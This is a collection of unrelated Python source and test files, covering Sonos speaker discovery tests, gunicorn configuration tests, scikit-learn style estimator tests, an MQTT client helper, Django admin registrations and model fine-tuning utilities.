_set_up_adapters(monkeypatch)
assert _find_ipv4_addresses() == {"192.168.0.1", "192.168.1.1", "192.168.3.11"}
def test__check_ip_and_port(monkeypatch):
_setup_sockets(monkeypatch)
assert _check_ip_and_port("192.168.0.1", 1400, 0.1) is True
assert _check_ip_and_port("192.168.0.1", 1401, 0.1) is False
assert _check_ip_and_port("192.168.0.3", 1400, 0.1) is False
def test__is_sonos(monkeypatch):
with patch("soco.config.SOCO_CLASS", new=_mock_soco_new):
assert _is_sonos("192.168.0.1") is True
assert _is_sonos("192.168.0.2") is True
assert _is_sonos("192.168.0.3") is False
def test__sonos_scan_worker_thread(monkeypatch):
_setup_sockets(monkeypatch)
with patch("soco.config.SOCO_CLASS", new=_mock_soco_new):
ip_set = {"192.168.0.1", "192.168.0.2", "192.168.0.3"}
sonos_ip_addresses = []
_sonos_scan_worker_thread(ip_set, 0.1, sonos_ip_addresses, False)
assert len(sonos_ip_addresses) == 1
assert (
"192.168.0.1" in sonos_ip_addresses or "192.168.0.2" in sonos_ip_addresses
)
assert "192.168.0.3" not in sonos_ip_addresses
ip_set = {"192.168.0.1", "192.168.0.2", "192.168.0.3"}
sonos_ip_addresses = []
_sonos_scan_worker_thread(ip_set, 0.1, sonos_ip_addresses, True)
assert len(sonos_ip_addresses) == 2
assert {"192.168.0.1", "192.168.0.2"} == set(sonos_ip_addresses)
assert "192.168.0.3" not in sonos_ip_addresses
def test_scan_network(monkeypatch):
_setup_sockets(monkeypatch)
_set_up_adapters(monkeypatch)
with patch("soco.config.SOCO_CLASS", new=_mock_soco_new):
assert "192.168.0.1" in scan_network(include_invisible=False)
assert "192.168.0.2" not in scan_network(include_invisible=False)
assert "192.168.0.1" in scan_network(
include_invisible=False, multi_household=True
)
assert "192.168.0.2" not in scan_network(
include_invisible=False, multi_household=True
)
assert "192.168.0.1" in scan_network(
include_invisible=True, multi_household=True
)
assert "192.168.0.2" in scan_network(include_invisible=True)
assert "192.168.0.2" in scan_network(
include_invisible=True, multi_household=True
)
# This one can take a few seconds to run; large address
# space, and large number of threads
assert "192.168.0.1" in scan_network(
include_invisible=False,
multi_household=True,
max_threads=15000,
min_netmask=16,
)
# Test specified networks
assert "192.168.0.1" in scan_network(
include_invisible=False, networks_to_scan=["192.168.0.1/24"]
)
assert "192.168.0.2" in scan_network(
include_invisible=True, networks_to_scan=["192.168.0.1/24"]
)
assert "192.168.0.2" not in scan_network(
include_invisible=False, networks_to_scan=["192.168.0.1/24"]
)
assert "192.168.0.1" in scan_network(networks_to_scan=[])
assert scan_network(networks_to_scan=["not_a_network", ""]) is None
# Helper functions for scan_network() tests
def _set_up_adapters(monkeypatch):
"""Helper function that creates a number of mock network adapters to be
returned by ifaddr.get_adapters()."""
private_24 = ifaddr.IP("192.168.0.1", 24, "private-24")
private_16 = ifaddr.IP("192.168.1.1", 16, "private-16")
public = ifaddr.IP("192.168.3.11", 8, "public")
loopback = ifaddr.IP("127.0.0.1", 24, "loopback")
link_local = ifaddr.IP("169.254.1.10", 16, "link_local")
ips = [private_24, private_16, public, loopback, link_local]
# Set up mock adapters
adapters = OrderedDict()
for index in range(len(ips)):
ip = ips[index]
adapters[ip.nice_name] = ifaddr._shared.Adapter(
ip.nice_name, ip.nice_name, [ip], index=index + 1
)
# Patch the response from ifaddr.get_adapters()
monkeypatch.setattr("ifaddr.get_adapters", Mock(return_value=adapters.values()))
def _mock_soco_new(ip_address):
"""Helper function that replaces the SoCo constructor. Returns Mock objects for
Sonos devices at two specific IP addresses."""
if ip_address in ["192.168.0.1", "192.168.0.2"]:
return Mock(
visible_zones=["192.168.0.1"], all_zones=["192.168.0.1", "192.168.0.2"]
)
else:
raise ValueError
def _setup_sockets(monkeypatch):
"""Helper function to create fake socket connection responses corresponding to
Sonos speakers on specific IP address / port combinations only."""
def mock_socket_connect_ex_return(_, address_port):
if address_port in [("192.168.0.1", 1400), ("192.168.0.2", 1400)]:
return 0
else:
return 1
monkeypatch.setattr("socket.socket.connect_ex", mock_socket_connect_ex_return)
|
142851
|
import mock
import pytest
from gunicorn.app.base import BaseApplication
from gunicorn.errors import ConfigError
from {{cookiecutter.package_name}} import ApplicationLoader
@mock.patch.object(BaseApplication, "run")
def test_wsgi_conf_defaults(run_mock):
app = mock.Mock()
wsgi = ApplicationLoader(app)
assert wsgi.load() == app
assert wsgi.cfg.worker_class_str == "uvicorn.workers.UvicornWorker"
assert wsgi.cfg.address == [("127.0.0.1", 8000)]
assert wsgi.cfg.env == {}
assert wsgi.cfg.settings["bind"].value == ["127.0.0.1:8000"]
assert wsgi.cfg.settings["raw_env"].value == []
assert wsgi.cfg.settings["workers"].value == 2
assert not wsgi.cfg.settings["daemon"].value
assert not wsgi.cfg.settings["pidfile"].value
wsgi.run()
run_mock.assert_called_once()
@mock.patch.object(BaseApplication, "run")
def test_wsgi_cli_overrides(run_mock):
app = mock.Mock()
wsgi = ApplicationLoader(
application=app,
overrides={
"raw_env": ("FOOBAR=123",),
"bind": "0.0.0.0:3000",
"workers": 3,
"daemon": True,
"pidfile": "/tmp/api.pid"
}
)
# Test unused patched method for coverage sake.
wsgi.init(None, None, None)
assert wsgi.cfg.address == [("0.0.0.0", 3000)]
assert wsgi.cfg.env == {"FOOBAR": "123"}
assert wsgi.cfg.settings["bind"].value == ["0.0.0.0:3000"]
assert wsgi.cfg.settings["raw_env"].value == ["FOOBAR=123"]
assert wsgi.cfg.settings["workers"].value == 3
assert wsgi.cfg.settings["daemon"].value
assert wsgi.cfg.settings["pidfile"].value == "/tmp/api.pid"
wsgi.run()
run_mock.assert_called_once()
def test_wsgi_bad_config():
app = mock.Mock()
with pytest.raises(SystemExit):
ApplicationLoader(
application=app,
overrides={
"unknown": True,
"workers": None,
}
)
|
142968
|
import logging
from assigner import manage_repos
from assigner.backends.exceptions import (
UserInAssignerGroup,
UserNotAssigned,
)
help = "Lock students out of repos"
logger = logging.getLogger(__name__)
def lock(args):
"""Sets each student to Reporter status on their homework repository so
they cannot push changes, etc.
"""
#pylint: disable=no-value-for-parameter
return manage_repos(args, _lock)
def _lock(repo, student):
try:
repo.lock(student["id"])
return True
except UserInAssignerGroup:
logging.info("%s cannot be locked out because they are a member of the group, skipping...", student["username"])
return False
except UserNotAssigned:
logging.info("%s has not been assigned for %s", repo.name, student["username"])
return False
def setup_parser(parser):
parser.add_argument("name",
help="Name of the assignment to lock.")
parser.add_argument("--section", nargs="?",
help="Section to lock")
parser.add_argument("--student", metavar="id",
help="ID of student whose assignment needs locking.")
parser.add_argument("--dry-run", action="store_true",
help="Don't actually do it.")
parser.set_defaults(run=lock)
|
142981
|
import os
import shutil
import time
from deeplens.dataflow.agg import counts
from deeplens.full_manager.condition import Condition
from deeplens.full_manager.full_manager import FullStorageManager
from deeplens.full_manager.full_video_processing import CropSplitter
from deeplens.media.youtube_tagger import YoutubeTagger
from deeplens.constants import *
from deeplens.tracking.contour import KeyPoints
from experiments.environ import logrecord
"""
I literally just want to make sure this iterator does what I think it does
I'm not going to worry about whether it's compatible with the storage manager
for now...
"""
def test_iteration(src):
youtubeTagger = YoutubeTagger(src, './train/processed_yt_bb_detection_train.csv')
for frame in youtubeTagger:
bb = frame['objects'][0]['bb']
bbstr = str(bb.x0) + ',' + str(bb.x1) + ',' + str(bb.y0) + ',' + str(bb.y1)
print(bbstr)
print(frame['objects'][0]['label'])
def test_put(src, cleanUp = False):
if cleanUp:
if os.path.exists('./videos'):
shutil.rmtree('./videos')
manager = FullStorageManager(None, CropSplitter(), 'videos')
start = time.time()
manager.put(src, os.path.basename(src), parallel = True, args={'encoding': XVID, 'size': -1, 'sample': 1.0, 'offset': 0, 'limit': -1, 'batch_size': 50, 'num_processes': 6})
print("Put time:", time.time() - start)
clips = manager.get(os.path.basename(src), Condition(label='person'))
pipelines = []
for c in clips:
pipelines.append(c[KeyPoints()])
result = counts(pipelines, ['one'], stats=True)
logrecord('full', ({'file': src}), 'get', str(result), 's')
test_put('./train/AACM71csS-Q.mp4', cleanUp=False)
|
142985
|
import setuptools
from sys import platform
# Use README for long description
with open('README.md', 'r') as readme_fp:
long_description = readme_fp.read()
with open('requirements.txt', 'r') as req_fp:
required_libs = req_fp.readlines()
# py_cui setup
setuptools.setup(
name='py_cui',
description='A widget and grid based framework for building command line user interfaces in python.',
long_description=long_description,
long_description_content_type='text/markdown',
version='0.1.4',
author='<NAME>',
author_email='<EMAIL>',
license='BSD (3-clause)',
packages=setuptools.find_packages(exclude=['docs','tests', 'examples', 'venv']),
install_requires=required_libs,
url='https://github.com/jwlodek/py_cui',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
keywords='cui cli commandline user-interface ui',
python_requires='>=3.6',
)
|
143042
|
import numpy as np
import pytest
from sklego.common import flatten
from sklego.dummy import RandomRegressor
from tests.conftest import nonmeta_checks, regressor_checks, general_checks, select_tests
@pytest.mark.parametrize(
"test_fn",
select_tests(
flatten([general_checks, nonmeta_checks, regressor_checks]),
exclude=[
"check_sample_weights_invariance",
"check_methods_subset_invariance",
"check_regressors_train",
"check_sample_weights_list",
"check_sample_weights_pandas_series"
]
)
)
def test_estimator_checks(test_fn):
# Tests that are skipped:
# 'check_methods_subset_invariance': Since we add noise, the method is not invariant on a subset
# 'check_regressors_train': score is not always greater than 0.5 due to randomness
regr_normal = RandomRegressor(strategy="normal")
test_fn(RandomRegressor.__name__ + "_normal", regr_normal)
regr_uniform = RandomRegressor(strategy="uniform")
test_fn(RandomRegressor.__name__ + "_uniform", regr_uniform)
def test_values_uniform(random_xy_dataset_regr):
X, y = random_xy_dataset_regr
mod = RandomRegressor(strategy="uniform")
predictions = mod.fit(X, y).predict(X)
assert (predictions >= y.min()).all()
assert (predictions <= y.max()).all()
assert mod.min_ == pytest.approx(y.min(), abs=0.0001)
assert mod.max_ == pytest.approx(y.max(), abs=0.0001)
def test_values_normal(random_xy_dataset_regr):
X, y = random_xy_dataset_regr
mod = RandomRegressor(strategy="normal").fit(X, y)
assert mod.mu_ == pytest.approx(np.mean(y), abs=0.001)
assert mod.sigma_ == pytest.approx(np.std(y), abs=0.001)
def test_bad_values():
np.random.seed(42)
X = np.random.normal(0, 1, (10, 2))
y = np.random.normal(0, 1, (10, 1))
with pytest.raises(ValueError):
RandomRegressor(strategy="foobar").fit(X, y)
|
143047
|
import paho.mqtt.client as mqtt
import datetime
import logging as log
import cfg
from time import sleep,time
import json
import socket
conf = {}
# -------------------- mqtt events --------------------
def on_connect(lclient, userdata, flags, rc):
global conf
log.info("mqtt> connected with result code "+str(rc))
if(conf["mqtt"]["subscribe"]):
for sub in userdata["mqtt"]["subscriptions"]:
log.info("mqtt> Subscription to %s",sub)
lclient.subscribe(sub)
else:
log.info("mqtt> Subscriptions not enabled")
if(conf["mqtt"]["publish"]):
log.info("mqtt> Publishing enabled")
else:
log.info("mqtt> Publishing not enabled")
def ruler_loop_forever():
while(True):
sleep(10)
return
def mqtt_start(config,mqtt_on_message,start_looping):
def mqtt_connect_retries(client):
connected = False
while(not connected):
try:
client.connect(config["mqtt"]["host"], config["mqtt"]["port"], config["mqtt"]["keepalive"])
connected = True
log.info( "mqtt> connected to "+config["mqtt"]["host"]+":"+str(config["mqtt"]["port"])+" with id: "+ cid )
except socket.error:
log.error("socket.error will try a reconnection in 10 s")
sleep(10)
return
global conf
conf = config
clientMQTT = None
if(config["mqtt"]["publish"] or config["mqtt"]["subscribe"]):
config["mqtt"]["enable"] = True
cid = config["mqtt"]["client_id"] +"_"+socket.gethostname()
clientMQTT = mqtt.Client(client_id=cid,userdata=config)
clientMQTT.on_connect = on_connect
clientMQTT.on_message = mqtt_on_message
mqtt_connect_retries(clientMQTT)
if(start_looping):
#the loop will be called in the run main loop()
clientMQTT.loop_start()
else:
config["mqtt"]["enable"] = False
return clientMQTT
|
143051
|
import textwrap
from ..formatter import AssetFormatter
wrapper = textwrap.TextWrapper(
initial_indent=' ', subsequent_indent=' ', width=80
)
def c_initializer(data):
if type(data) is str:
data = data.encode('utf-8')
values = ', '.join(f'0x{c:02x}' for c in data)
return f' = {{\n{wrapper.fill(values)}\n}}'
def c_declaration(types, symbol, data=None):
return textwrap.dedent(
'''\
{types} uint8_t {symbol}[]{initializer};
{types} uint32_t {symbol}_length{size};
'''
).format(
types=types,
symbol=symbol,
initializer=c_initializer(data) if data else '',
size=f' = sizeof({symbol})' if data else '',
)
def c_boilerplate(data, include, header=True):
lines = ['// Auto Generated File - DO NOT EDIT!']
if header:
lines.append('#pragma once')
lines.append(f'#include <{include}>')
lines.append('')
lines.extend(data)
return '\n'.join(lines)
@AssetFormatter(extensions=('.hpp', '.h'))
def c_header(symbol, data):
return {None: c_declaration('inline const', symbol, data)}
@c_header.joiner
def c_header(path, fragments):
return {None: c_boilerplate(fragments[None], include="cstdint", header=True)}
@AssetFormatter(components=('hpp', 'cpp'), extensions=('.cpp', '.c'))
def c_source(symbol, data):
return {
'hpp': c_declaration('extern const', symbol),
'cpp': c_declaration('const', symbol, data),
}
@c_source.joiner
def c_source(path, fragments):
include = path.with_suffix('.hpp').name
return {
'hpp': c_boilerplate(fragments['hpp'], include='cstdint', header=True),
'cpp': c_boilerplate(fragments['cpp'], include=include, header=False),
}
|
143099
|
from django.contrib import admin
from django.contrib.auth.admin import User
from server.models.collective import Collective, Session
from server.models.qualification import Qualification, QualificationGroup
from server.models.instruction import Instruction, Topic
from server.models.category import Category, CategoryGroup
from server.models.tour import Tour
from server.models.equipment import Equipment
from server.models.calendar import Calendar, Anniversary, Vacation
from server.user_admin import UserAdmin
from server.event_admin import InstructionAdmin, TourAdmin
# Register your models here.
# Auth.User
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
# Calendar
admin.site.register(Calendar)
admin.site.register(Anniversary)
admin.site.register(Vacation)
# Collective
admin.site.register(Collective)
admin.site.register(Session)
# Qualifications
admin.site.register(Qualification)
admin.site.register(QualificationGroup)
# Mixins
admin.site.register(Category)
admin.site.register(CategoryGroup)
admin.site.register(Tour, TourAdmin)
admin.site.register(Equipment)
# Instructions
admin.site.register(Instruction, InstructionAdmin)
admin.site.register(Topic)
|
143105
|
import copy
import numpy as np
import pytest
import tensorflow as tf
from tfsnippet.layers import as_gated
def safe_sigmoid(x):
return np.where(x < 0, np.exp(x) / (1. + np.exp(x)), 1. / (1. + np.exp(-x)))
class AsGatedHelper(object):
def __init__(self, main_ret, gate_ret):
self.main_args = None
self.gate_args = None
self.main_ret = main_ret
self.gate_ret = gate_ret
def __call__(self, *args, **kwargs):
scope = kwargs['scope']
if scope == 'main':
assert(self.main_args is None)
self.main_args = (args, copy.copy(kwargs))
return self.main_ret
elif scope == 'gate':
assert(self.gate_args is None)
self.gate_args = (args, copy.copy(kwargs))
return self.gate_ret
else:
raise RuntimeError()
class TestAsGated(tf.test.TestCase):
def test_as_gated(self):
main_ret = np.random.normal(size=[2, 3, 4]).astype(np.float32)
gate_ret = np.random.normal(size=[2, 3, 4]).astype(np.float32)
activation_fn = object()
# default_name infer failed
with pytest.raises(ValueError,
match='`default_name` cannot be inferred'):
g = as_gated(AsGatedHelper(main_ret, gate_ret))
with self.test_session() as sess:
# test infer default name
f = AsGatedHelper(main_ret, gate_ret)
f.__name__ = 'f'
g = as_gated(f)
g_ret = g(1, xyz=2, activation_fn=activation_fn)
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'gated_f/')
self.assertEqual(
f.main_args,
(
(1,),
{'xyz': 2, 'activation_fn': activation_fn, 'scope': 'main'}
)
)
self.assertEqual(
f.gate_args,
(
(1,),
{'xyz': 2, 'scope': 'gate'}
)
)
# test specify default name
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, sigmoid_bias=1., default_name='ff')
g_ret = g(1, xyz=2, activation_fn=activation_fn)
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 1.))
self.assertTrue(g_ret.name, 'gated_ff/')
self.assertEqual(
f.main_args,
(
(1,),
{'xyz': 2, 'activation_fn': activation_fn, 'scope': 'main'}
)
)
self.assertEqual(
f.gate_args,
(
(1,),
{'xyz': 2, 'scope': 'gate'}
)
)
# test using `name`
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, default_name='f')
g_ret = g(1, xyz=2, activation_fn=activation_fn, name='name')
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'name/')
# test using `scope`
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, default_name='f')
g_ret = g(1, xyz=2, activation_fn=activation_fn, scope='scope')
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'scope/')
|
143113
|
from django.test import override_settings
from rest_framework import status
from thenewboston_node.business_logic.tests.base import as_primary_validator, force_blockchain
API_V1_LIST_BLOCKCHAIN_STATE_URL = '/api/v1/blockchain-states-meta/'
def test_memory_blockchain_supported(api_client, memory_blockchain, primary_validator_key_pair):
with force_blockchain(memory_blockchain):
with override_settings(NODE_SIGNING_KEY=primary_validator_key_pair.private):
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL)
assert response.status_code == status.HTTP_200_OK
def test_can_list_blockchain_state_meta(api_client, file_blockchain_with_two_blockchain_states, pv_network_address):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL)
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
blockchain_state_0, blockchain_state_1 = data['results']
expected = file_blockchain_with_two_blockchain_states.get_first_blockchain_state().last_block_number
assert blockchain_state_0['last_block_number'] == expected
assert blockchain_state_0['url_path'] == (
'/blockchain/blockchain-states/0/0/0/0/0/0/0/0/0000000000000000000!-blockchain-state.msgpack.gz'
)
assert len(blockchain_state_0['urls']) == 1
assert blockchain_state_0['urls'][0] == (
f'{pv_network_address}blockchain/blockchain-states'
'/0/0/0/0/0/0/0/0/0000000000000000000!-blockchain-state.msgpack.gz'
)
assert blockchain_state_1['last_block_number'] == 1
# TODO(dmu) CRITICAL: Stabilize unittests and remove `or`
assert blockchain_state_1['url_path'] == (
'/blockchain/blockchain-states/0/0/0/0/0/0/0/0/00000000000000000001-blockchain-state.msgpack'
) or blockchain_state_1['url_path'] == (
'/blockchain/blockchain-states/0/0/0/0/0/0/0/0/00000000000000000001-blockchain-state.msgpack.gz'
)
assert len(blockchain_state_1['urls']) == 1
assert blockchain_state_1['urls'][0] == (
f'{pv_network_address}blockchain/blockchain-states'
'/0/0/0/0/0/0/0/0/00000000000000000001-blockchain-state.msgpack'
) or blockchain_state_1['urls'][0] == (
f'{pv_network_address}blockchain/blockchain-states'
'/0/0/0/0/0/0/0/0/00000000000000000001-blockchain-state.msgpack.gz'
)
def test_can_sort_ascending_blockchain_states_meta(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=last_block_number')
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
blockchain_state_0, blockchain_state_1 = data['results']
expected = file_blockchain_with_two_blockchain_states.get_first_blockchain_state().last_block_number
assert blockchain_state_0['last_block_number'] == expected
assert blockchain_state_1['last_block_number'] == 1
def test_can_sort_descending_blockchain_states_meta(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=-last_block_number')
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
blockchain_state_0, blockchain_state_1 = data['results']
assert blockchain_state_0['last_block_number'] == 1
expected = file_blockchain_with_two_blockchain_states.get_first_blockchain_state().last_block_number
assert blockchain_state_1['last_block_number'] == expected
def test_can_get_blockchain_states_meta_w_limit(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?limit=1')
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
assert len(data['results']) == 1
expected = file_blockchain_with_two_blockchain_states.get_first_blockchain_state().last_block_number
assert data['results'][0]['last_block_number'] == expected
def test_can_get_blockchain_states_meta_w_offset(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?limit=1&offset=1')
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
assert len(data['results']) == 1
assert data['results'][0]['last_block_number'] == 1
def test_pagination_is_applied_after_ordering(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?offset=1&ordering=-last_block_number')
assert response.status_code == status.HTTP_200_OK
data = response.json()
assert data['count'] == 2
assert len(data['results']) == 1
assert data['results'][0]['last_block_number'] == -1
|
143117
|
import theano
import theano.tensor as T
import lasagne as nn
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
class SpatialDropoutLayer(Layer):
"""Spatial dropout layer
Sets whole filter activations to zero with probability p. See notes for
disabling dropout during testing.
Parameters
----------
incoming : a :class:`Layer` instance or a tuple
the layer feeding into this layer, or the expected input shape
p : float or scalar tensor
The probability of setting a value to zero
rescale : bool
If true the input is rescaled with input / (1-p) when deterministic
is False.
Notes
-----
The spatial dropout layer is a regularizer that randomly sets whole the
values of whole features to zero. This is an adaptation of normal dropout,
which is generally useful in fully convolutional settings, such as [1]_.
It is also called a feature dropout layer.
During training you should set deterministic to false and during
testing you should set deterministic to true.
If rescale is true the input is scaled with input / (1-p) when
deterministic is false, see references for further discussion. Note that
this implementation scales the input at training time.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., <NAME>. (2016):
Deep Learning for Human Part Discovery in Images. IEEE
International Conference on Robotics and Automation (ICRA), IEEE,
2016.
"""
def __init__(self, incoming, p=0.5, rescale=True, **kwargs):
super(SpatialDropoutLayer, self).__init__(incoming, **kwargs)
self._srng = RandomStreams(get_rng().randint(1, 2147462579))
self.p = p
self.rescale = rescale
def get_output_for(self, input, deterministic=False, **kwargs):
"""
Parameters
----------
input : tensor
output from the previous layer
deterministic : bool
If true dropout and scaling is disabled, see notes
"""
if deterministic or self.p == 0:
return input
else:
# Using theano constant to prevent upcasting
one = T.constant(1)
retain_prob = one - self.p
if self.rescale:
input /= retain_prob
mask = _srng.binomial(input.shape[:2], p=retain_prob,
dtype=theano.config.floatX)
axes = [0, 1] + (['x'] * (input.ndim - 2))
mask = mask.dimshuffle(*axes)
return input * mask
|
143131
|
import os
from robustness import datasets, model_utils
from torchvision import models
from torchvision.datasets import CIFAR100
import torch as ch
from . import constants as cs
from . import fine_tunify
from .custom_models.vision_transformer import *
pytorch_models = {
'alexnet': models.alexnet,
'vgg16': models.vgg16,
'vgg16_bn': models.vgg16_bn,
'squeezenet': models.squeezenet1_0,
'densenet': models.densenet161,
'shufflenet': models.shufflenet_v2_x1_0,
'mobilenet': models.mobilenet_v2,
'resnext50_32x4d': models.resnext50_32x4d,
'mnasnet': models.mnasnet1_0
}
vitmodeldict = {
# ImageNet
'deit_tiny_patch16_224': deit_tiny_patch16_224,
'deit_small_patch16_224': deit_small_patch16_224,
'deit_base_patch16_224': deit_base_patch16_224,
'deit_base_patch16_384': deit_base_patch16_384,
##CIFAR10
'deit_tiny_patch4_32': deit_tiny_patch4_32,
'deit_small_patch4_32': deit_small_patch4_32,
'deit_base_patch4_32': deit_base_patch4_32,
}
TRANSFER_DATASETS = ['cifar10', 'cifar100']
def get_dataset_and_loaders(args, shuffle_train=True, shuffle_val=False):
'''Given arguments, returns a datasets object and the train and validation loaders.
'''
if args.dataset in ['imagenet', 'stylized_imagenet']:
ds = datasets.ImageNet(args.data)
img_size = 224
elif args.dataset == 'cifar10':
ds = datasets.CIFAR(args.data)
ds.transform_train = cs.TRAIN_TRANSFORMS
ds.transform_test = cs.TEST_TRANSFORMS
img_size = 32
elif args.dataset == 'cifar100':
ds = datasets.CIFAR(args.data, num_classes=100, name='cifar100',
mean=[0.5071, 0.4867, 0.4408],
std=[0.2675, 0.2565, 0.2761])
ds.transform_train = cs.TRAIN_TRANSFORMS
ds.transform_test = cs.TEST_TRANSFORMS
ds.custom_class = CIFAR100
img_size = 32
train_loader, val_loader = ds.make_loaders(only_val=args.eval_only, batch_size=args.batch_size,
workers=args.workers, shuffle_train=shuffle_train, shuffle_val=shuffle_val)
return ds, train_loader, val_loader
def resume_finetuning_from_checkpoint(args, ds, finetuned_model_path):
'''Given arguments, dataset object and a finetuned model_path, returns a model
with loaded weights and returns the checkpoint necessary for resuming training.
'''
print('[Resuming finetuning from a checkpoint...]')
arch, add_custom_forward = get_arch(args)
if args.dataset in TRANSFER_DATASETS:
model, _ = model_utils.make_and_restore_model(
arch=arch, dataset=datasets.ImageNet(''), add_custom_forward=add_custom_forward)
while hasattr(model, 'model'):
model = model.model
model = fine_tunify.ft(
args.arch, model, ds.num_classes, args.additional_hidden)
model, checkpoint = model_utils.make_and_restore_model(arch=model, dataset=ds, resume_path=finetuned_model_path,
add_custom_forward=args.additional_hidden > 0 or add_custom_forward)
else:
model, checkpoint = model_utils.make_and_restore_model(
arch=arch, dataset=ds, resume_path=finetuned_model_path,
add_custom_forward=add_custom_forward)
return model, checkpoint
def get_arch(args):
add_custom_forward = True
if args.arch in pytorch_models.keys():
arch = pytorch_models[args.arch](args.pytorch_pretrained)
elif args.arch in vitmodeldict:
arch = vitmodeldict[args.arch](pretrained=args.pytorch_pretrained,
num_classes=1000,
drop_rate=0.,
drop_path_rate=0.1)
else:
arch = args.arch
add_custom_forward = False
return arch, add_custom_forward
def get_model(args, ds):
'''Given arguments and a dataset object, returns an ImageNet model (with appropriate last layer changes to
fit the target dataset) and a checkpoint. The checkpoint is set to None if not resuming training.
'''
finetuned_model_path = os.path.join(
args.out_dir, args.exp_name, args.resume_ckpt_name)
if args.resume and os.path.isfile(finetuned_model_path):
# fix hijacking of normalizer
patch_state_dict(finetuned_model_path)
model, checkpoint = resume_finetuning_from_checkpoint(
args, ds, finetuned_model_path)
else:
arch, add_custom_forward = get_arch(args)
if args.dataset in TRANSFER_DATASETS:
model, _ = model_utils.make_and_restore_model(
arch=arch,
dataset=datasets.ImageNet(''), resume_path=args.model_path, pytorch_pretrained=args.pytorch_pretrained,
add_custom_forward=add_custom_forward)
checkpoint = None
else:
model, _ = model_utils.make_and_restore_model(arch=arch, dataset=ds,
resume_path=args.model_path, pytorch_pretrained=args.pytorch_pretrained,
add_custom_forward=add_custom_forward)
checkpoint = None
if not args.no_replace_last_layer and not args.eval_only and args.dataset in TRANSFER_DATASETS:
print(f'[Replacing the last layer with {args.additional_hidden} '
f'hidden layers and 1 classification layer that fits the {args.dataset} dataset.]')
while hasattr(model, 'model'):
model = model.model
model = fine_tunify.ft(
args.arch, model, ds.num_classes, args.additional_hidden)
model, checkpoint = model_utils.make_and_restore_model(arch=model, dataset=ds,
add_custom_forward=args.additional_hidden > 0 or add_custom_forward)
else:
print('[NOT replacing the last layer]')
return model, checkpoint
def freeze_model(model, freeze_level):
'''
Freezes up to args.freeze_level layers of the model (assumes a resnet model)
'''
# Freeze layers according to args.freeze-level
update_params = None
if freeze_level != -1:
# assumes a resnet architecture
assert len([name for name, _ in list(model.named_parameters())
if f"layer{freeze_level}" in name]), "unknown freeze level (only {1,2,3,4} for ResNets)"
update_params = []
freeze = True
for name, param in model.named_parameters():
print(name, param.size())
if not freeze and f'layer{freeze_level}' not in name:
print(f"[Appending the params of {name} to the update list]")
update_params.append(param)
else:
param.requires_grad = False
if freeze and f'layer{freeze_level}' in name:
# if the freeze level is detected stop freezing onwards
freeze = False
return update_params
def patch_state_dict(path):
pth = torch.load(path)
d = pth['model']
if ("normalizer.1.new_mean" in d or "normalizer.1.new_std" in d
or "module.normalizer.1.new_mean" in d
or "module.normalizer.1.new_std" in d
or "normalizer.normalizer.new_mean" in d
or "normalizer.normalizer.new_std" in d
or "module.normalizer.normalizer.new_mean" in d
or "module.normalizer.normalizer.new_std" in d):
print("Patching normalizer module")
new_d = {}
for k in d:
new_k = k
if k == "normalizer.1.new_mean":
new_k = "normalizer.new_mean"
if k == "normalizer.1.new_std":
new_k = "normalizer.new_std"
if k == "module.normalizer.1.new_mean":
new_k = "module.normalizer.new_mean"
if k == "module.normalizer.1.new_std":
new_k = "module.normalizer.new_std"
if k == "normalizer.normalizer.new_mean":
new_k = "normalizer.new_mean"
if k == "normalizer.normalizer.new_std":
new_k = "normalizer.new_std"
if k == "module.normalizer.normalizer.new_mean":
new_k = "module.normalizer.new_mean"
if k == "module.normalizer.normalizer.new_std":
new_k = "module.normalizer.new_std"
new_d[new_k] = d[k]
pth['model'] = new_d
torch.save(pth,path)
return
|
143137
|
import functools
import click
from ..arguments import commands_argument, run_file_option
def run_command(f):
@commands_argument
@run_file_option
@functools.wraps(f)
def wrapper(*args, commands, run_file, **kwargs):
if run_file:
run_options = run_file.data
else:
run_options = {}
if not commands:
try:
commands = run_options["run"]
except KeyError as ke:
raise click.UsageError(
"Missing command: Please specify your run command via arguments or in the 'run' section of the run file."
) from ke
return f(*args, command=commands, run_options=run_options, **kwargs)
return wrapper
|
